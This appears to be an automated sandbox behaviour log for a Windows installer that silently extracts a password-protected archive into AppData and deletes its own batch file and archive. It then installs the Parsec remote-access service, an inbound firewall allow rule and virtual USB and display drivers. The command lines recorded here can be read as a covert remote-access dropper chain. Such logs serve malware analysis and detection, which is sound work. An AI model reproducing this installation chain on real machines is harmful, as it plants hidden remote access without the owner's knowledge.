Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC021850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle,40_2_00007FF7EC021850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_004021AA CoCreateInstance,12_2_004021AA
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC022AC0 StartServiceCtrlDispatcherW,40_2_00007FF7EC022AC0
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC022AC0 StartServiceCtrlDispatcherW,40_2_00007FF7EC022AC0
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "parsecd.exe")
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: nefconc.exeString found in binary or memory: --add-class-filter
Source: nefconc.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconc.exeString found in binary or memory: --inf-default-install
Source: nefconc.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconc.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconc.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconc.exeString found in binary or memory: --install-driver
Source: nefconw.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exeString found in binary or memory: --install-driver
Source: nefconw.exeString found in binary or memory: --inf-default-install
Source: nefconw.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconw.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exeString found in binary or memory: --add-class-filter
Source: nefconw.exeString found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exeString found in binary or memory: --inf-default-install
Source: nefconw.exeString found in binary or memory: Invoked --inf-default-install
Source: nefconw.exeString found in binary or memory: --install-driver
Source: nefconw.exeString found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exeString found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exeString found in binary or memory: --add-class-filter
Source: uu8v4UUzTU.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeFile read: C:\Users\user\Desktop\uu8v4UUzTU.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\uu8v4UUzTU.exe "C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files\Parsec\pservice.exe "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /SJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete ParsecJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Program Files\Parsec\pservice.exeProcess created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Parsec\pservice.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
